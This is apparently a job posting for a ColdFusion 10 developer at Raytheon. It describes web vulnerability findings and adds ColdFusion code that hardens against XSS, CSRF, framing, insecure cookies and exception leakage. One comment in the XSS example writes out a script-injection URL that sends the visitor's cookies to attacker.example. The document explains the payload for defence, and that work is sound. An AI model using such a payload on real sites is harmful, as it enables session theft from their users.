Exception Error Message – An unhandled exception occurs when the application receives input it did not expect and has no code path for. The resulting error page typically exposes stack traces, file system paths, query text or library versions, and an attacker can deliberately trigger such conditions to map the application and, in many cases, to gain unauthorized access. Recommendations include a consistent error-handling mechanism that catches every failure, logs the detail server-side, and shows end-users a meaningful but generic message, so that nothing useful to an attacker is ever displayed.
ColdFusion Developer needed
Location: Raytheon, Garland, TX (can be worked remotely)
GeoLogics Corporation is working with Raytheon Company and we are looking for a ColdFusion Developer. If selected, you will work for GeoLogics at the Raytheon office in Garland, TX. You must be a US Citizen to apply. This is a short-term project initially, but because many applications need to be ported to other supported application platforms, it has the potential to become a longer-term position. This project can be worked remotely.
This position requires a ColdFusion Developer with ColdFusion 10 experience. Specific experience remediating the security vulnerabilities detailed in the tables below would be a major plus:
Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information or search terms, without encoding it for the context it is written into, allowing an attacker to embed a malicious script in the generated page that then runs in the browser of any user who views it, with that user's session.
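As an added illustration (not code from the posting, GeoLogics or Raytheon), the ColdFusion 10 page below shows the same reflected value written into three output contexts, first unencoded and then with the context-specific encoders that shipped with ColdFusion 10. The page name and the `q` and `theme` URL parameters are hypothetical.

```cfml
<!--- search.cfm (hypothetical): echoes a search term back to the user --->
<cfparam name="url.q" default="">
<cfparam name="url.theme" default="light">

<!--- VULNERABLE: raw input lands in HTML text, an attribute and a JavaScript
      string. A request such as
      ?q=<script>location='http://attacker.example/?c='%2Bdocument.cookie</script>
      executes in every visitor's browser. --->
<cfoutput>
  <h2>Results for #url.q#</h2>
  <div class="results #url.theme#"></div>
  <script>var lastQuery = '#url.q#';</script>
</cfoutput>

<!--- HARDENED: encode for the context the value lands in. The encodeFor*()
      functions are the ESAPI-backed encoders added in ColdFusion 10.
      htmlEditFormat() is NOT a substitute: it leaves single quotes alone,
      so it fails inside single-quoted attributes and JavaScript strings,
      and this.scriptProtect is only a regex blocklist for <script>-style
      tags, not a fix. --->
<cfoutput>
  <h2>Results for #encodeForHTML(url.q)#</h2>
  <div class="results #encodeForHTMLAttribute(url.theme)#"></div>
  <!--- \xHH escaping also neutralises "</script>" inside the string --->
  <script>var lastQuery = '#encodeForJavaScript(url.q)#';</script>
  <a href="search.cfm?q=#encodeForURL(url.q)#">Permalink</a>
</cfoutput>
```

The rule of thumb the example demonstrates: choose the encoder by where the value ends up (HTML body, attribute, JavaScript, URL), not by where it came from.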
Cross-Frame Scripting (XFS) – The vulnerable application can be loaded inside an HTML iframe on a page the attacker controls, because it sends no X-Frame-Options (or Content-Security-Policy frame-ancestors) header telling browsers to refuse framing. The attacker can use this weakness to build a clickjacking attack, overlaying the invisible frame with decoy controls, to conduct phishing, frame sniffing, social engineering or Cross-Site Request Forgery attacks.
Logins Sent Over Unencrypted Connection – A login form submits its credentials to a plain HTTP URL. Any area of a web application that contains sensitive information or access to privileged functionality, such as remote site administration, must be served over TLS (HTTPS) so that login information cannot be sniffed on the network or otherwise intercepted or stolen.
Unencrypted Login Form – The page carrying the login form was itself delivered over plain HTTP. Even if the form posts to an HTTPS URL, an attacker on the path can rewrite the page so that the credentials go elsewhere, so the form and everything that reaches privileged functionality must be served over TLS (HTTPS) to prevent login information from being intercepted or stolen.
Cross-Site Request Forgery (XSRF or CSRF) has been detected. Because a browser attaches the user's cookies to every request it sends to a site, regardless of which page caused the request, a page the attacker controls can make the browser send a request (never seen by the user) to a site on which the user is authenticated, and that site will process it as if the user had authorized it. The remedy is to require, on every state-changing request, a secret token that only a page served by the legitimate site could have obtained.
Password Field Auto Complete Active – Most current browsers will save the content of password fields and automatically complete them the next time the field is encountered, so anyone with access to the machine, or to its stored form data, can reuse the credentials. The conventional fix is autocomplete="off" on the form or field, with the caveat that current browsers deliberately ignore it for login fields and fall back to their own password managers.
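The CSRF and auto-complete findings above are addressed together in the added ColdFusion 10 example below, which is not code from the posting, GeoLogics or Raytheon. It uses the csrfGenerateToken()/csrfVerifyToken() functions introduced in ColdFusion 10 (they are bound to the session, so Application.cfc must enable session management). The two page names, the "pwchange" token key and the application.accounts helper are hypothetical.

```cfml
<!--- changePassword.cfm (hypothetical): the form --->
<cfoutput>
<form method="post" action="updatePassword.cfm" autocomplete="off">
  <!--- Per-session token. A page on another origin cannot read it, so a
        forged request will arrive without it. --->
  <input type="hidden" name="csrfToken"
         value="#encodeForHTMLAttribute(csrfGenerateToken("pwchange"))#">
  <!--- autocomplete="off" on the password fields addresses the
        auto-complete finding (see caveat above about modern browsers). --->
  <label>Current password <input type="password" name="oldPassword" autocomplete="off"></label>
  <label>New password <input type="password" name="newPassword" autocomplete="off"></label>
  <button type="submit">Change password</button>
</form>
</cfoutput>

<!--- updatePassword.cfm (hypothetical): the handler --->
<cfparam name="form.csrfToken" default="">
<cfparam name="form.oldPassword" default="">
<cfparam name="form.newPassword" default="">

<!--- State changes only via POST: a GET triggered by <img src> or a link
      must never reach the password-change logic. --->
<cfif cgi.request_method NEQ "POST">
  <cfheader statuscode="405" statustext="Method Not Allowed">
  <cfabort>
</cfif>

<!--- Reject the request unless the token matches the one issued to THIS
      session for THIS key. Log it: a mismatch is a real attack signal. --->
<cfif NOT csrfVerifyToken(form.csrfToken, "pwchange")>
  <cflog file="security" type="warning"
         text="CSRF token mismatch from #cgi.remote_addr# on #cgi.script_name#">
  <cfheader statuscode="403" statustext="Forbidden">
  <cfabort>
</cfif>

<!--- Token is good; re-authenticate with the current password before
      changing it. application.accounts is a hypothetical service object. --->
<cfif application.accounts.changePassword(session.userId, form.oldPassword, form.newPassword)>
  <cflocation url="changePassword.cfm?done=1" addtoken="false">
<cfelse>
  <cflocation url="changePassword.cfm?error=1" addtoken="false">
</cfif>
```

Two details matter as much as the token itself: the method check, so a GET can never change state, and addtoken="false" on the redirects, so CFID/CFTOKEN are never appended to a URL where a referrer or log could capture them.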
Persistent Cookies – Cookies are small bits of data sent by the web application but stored locally in the browser, which lets the application pass information between pages and keep per-user state. A cookie with an expiry date survives closing the browser and stays on disk, so session identifiers and anything else sensitive should be issued as session cookies (no expiry) with the Secure and HttpOnly flags set, not as persistent cookies.
Script Directory Check – A directory was discovered that contains an object referenced in a POST request or query string, and whose name could easily be guessed by an attacker. Guessable script directories invite enumeration of the scripts inside them; remove scripts that are not needed, disable directory listing, and restrict access to administrative or utility directories.
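Four of the findings above (Cross-Frame Scripting, logins sent over an unencrypted connection / unencrypted login form, persistent cookies, and the exception error message) are handled at the application level in ColdFusion 10, so they are collected in one Application.cfc in this added example. It is not code from the posting, GeoLogics or Raytheon; the application name, log file name and error text are placeholders, and the HTTPS check assumes ColdFusion sees the TLS connection directly (behind a TLS-terminating proxy you would test the X-Forwarded-Proto header instead).

```cfml
<!--- Application.cfc (added example) --->
<cfcomponent output="false">
  <cfset this.name = "mysite">
  <cfset this.sessionManagement = true>
  <cfset this.sessionTimeout = createTimeSpan(0, 0, 30, 0)>

  <!--- Persistent Cookies: ColdFusion 10 session-cookie settings. HttpOnly
        keeps CFID/CFTOKEN away from script (limits what an XSS can steal),
        Secure keeps them off plain HTTP, and no expiry is set, so they are
        session cookies rather than persistent ones. --->
  <cfset this.sessioncookie.httponly = true>
  <cfset this.sessioncookie.secure = true>
  <cfset this.sessioncookie.disableupdate = true>

  <cffunction name="onRequestStart" returntype="boolean" output="false">
    <cfargument name="targetPage" type="string" required="true">

    <!--- Unencrypted login form / logins over an unencrypted connection:
          force HTTPS for every request, never only the login page.
          addtoken="false" keeps CFID/CFTOKEN out of the redirect URL. --->
    <cfif NOT cgi.server_port_secure>
      <cflocation url="https://#cgi.server_name##cgi.script_name#"
                  addtoken="false" statuscode="301">
    </cfif>
    <cfheader name="Strict-Transport-Security" value="max-age=31536000">

    <!--- Cross-Frame Scripting: refuse to be framed. Both headers, because
          older browsers only honour X-Frame-Options. --->
    <cfheader name="X-Frame-Options" value="DENY">
    <cfheader name="Content-Security-Policy" value="frame-ancestors 'none'">

    <!--- Never append ColdFusion debug output to a production response. --->
    <cfsetting showdebugoutput="false">
    <cfreturn true>
  </cffunction>

  <!--- Exception Error Message: every uncaught exception ends here.
        Full detail goes to the server log under a correlation id; the user
        sees only a generic message with that id. Also turn off "Enable
        Robust Exception Information" in the ColdFusion Administrator,
        otherwise the default error page still prints stack traces. --->
  <cffunction name="onError" returntype="void" output="true">
    <cfargument name="exception" required="true">
    <cfargument name="eventName" type="string" required="false" default="">
    <cfset var ref = createUUID()>

    <cflog file="mysite-errors" type="error"
           text="[#ref#] #arguments.exception.message# | #arguments.exception.detail# | #cgi.script_name#">

    <cfheader statuscode="500" statustext="Internal Server Error">
    <cfoutput>
      <p>Something went wrong. Please quote reference #ref# when reporting this.</p>
    </cfoutput>
  </cffunction>
</cfcomponent>
```

The log line deliberately records the script name but not the query string or form fields, since those may carry credentials or tokens; log the correlation id instead and join on it when investigating.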